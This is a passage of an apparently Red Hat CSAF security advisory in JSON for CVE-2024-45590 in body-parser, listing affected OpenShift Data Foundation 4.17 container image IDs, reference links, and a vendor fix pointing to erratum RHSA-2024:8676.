"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45590"
},
{
"category": "external",
"summary": "RHBZ#2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45590"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce",
"url": "https://github.com/expressjs/body-parser/commit/b2695c4450f06ba3b0ccf48d872a229bb41c9bce"
},
{
"category": "external",
"summary": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7",
"url": "https://github.com/expressjs/body-parser/security/advisories/GHSA-qwcr-r2fm-qrc7"
}
],
"release_date": "2024-09-10T16:15:21.083000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
